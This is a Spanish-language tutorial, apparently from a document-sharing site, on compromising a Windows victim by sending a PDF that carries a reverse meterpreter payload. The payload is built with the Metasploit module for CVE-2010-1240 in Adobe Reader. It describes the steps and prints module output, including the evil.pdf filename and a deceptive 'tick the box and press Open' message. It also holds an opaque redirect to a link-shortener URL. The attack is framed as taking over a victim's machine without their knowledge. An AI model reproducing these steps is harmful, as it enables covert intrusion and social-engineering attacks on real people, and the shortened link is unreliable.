Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Hacking Con PDF
Hacking Con PDF
En esta ocasión mostraré cómo por medio de Kali Linux podremos acceder remotamente utilizando
un archivo .pdf infectado a un equipo Windows víctima. Se utiliza un meterpreter reverse lo cual
nos indica enseña que la conexión se hará de forma inversa luego que la víctima ejecute el archivo
el atacante podrá acceder a su máquina sin que este se dé cuenta.
Lo primero que debemos asegurar es que la víctima pueda estar en la misma red, o que el atacante
pueda tener alcanzabilidad a su víctima.
Vamos a crear un archivo que tenga un Payload infectado para enviarlo a la víctima.
Ahora, vamos a utilizar nuestro archive .pdf que tenemos con la información a enviar a la víctima,
pero en realidad estará infectado.
Ahora, utilizaremos una conexión reverse dado que necesitamos que la víctima ejecute el archivo
para que nos permita el acceso a la máquina atacante sin problemas.
Ahora, debemos escribir el Puerto que utilizará el Atacante para su conexión, y damos Enter
Nos pide que utilicemos el mismo nombre o cambiar el nombre del archivo. Esta parte es a
consideración del interesado. En este caso, vamos a Renombra el nombre del archivo.
Luego de crear el archivo, observamos que no se encuentra en alojado en el Escritorio, por ende,
debemos utilizar técnicas de búsqueda en sistemas operativos Linux. Una de ellas es el siguiente
comando el cual, lo puede utilizar para buscar un archivo que esté en su sistema operativo, pero ud
no sabe dónde lo dejo alojado. find / -type f -name Informe.pdf
Buscamos handler
Ahora usamos ese exploit para iniciar nuestra configuración para atacar la máquina de la víctima.
https://www.youtube.com/redirect?
event=comments&redir_token=QUFFLUhqblNOQmY4OEpiY0x0ZlB3ZmVkM0NYcy1JWVJ1Q
XxBQ3Jtc0ttZUJMeks5SFR6RDlOZ3RxMGJHWTZDa1hWbmJ5LUN1Nld3UFU2aDJULUs1Nn
NmUVJDcXZuYjNaRzI4ODgycTRPeldfa2hnYlctQnNTZTc0NzlfaHNiaHBfdEMzMWdGdUE0R
0dqM3hxTW9QNk0xVm4xYw&q=https%3A%2F%2Fexe.io
%2FnnL81m&stzid=UgyvT6vjvaibNWEdTJN4AaABAg
Matching Modules
================
Provided by:
Colin Ames <amesc@attackresearch.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)
Basic options:
Name Current Setting Required
Description
---- --------------- -------- -----------
EXENAME no The Name
of payload exe.
FILENAME evil.pdf no The
output filename.
INFILENAME /usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf
yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message
again" box and press Open. no The message to display in the File: area
Payload information:
Space: 2048
Description:
This module embeds a Metasploit payload into an existing PDF file.
The resulting PDF can be sent to a target as part of a social
engineering attack.
References:
https://cvedetails.com/cve/CVE-2010-1240/
OSVDB (63667)
http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
http://www.adobe.com/support/security/bulletins/apsb10-15.html
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)
Exploit target:
Id Name
-- ----
0 Wildcard Target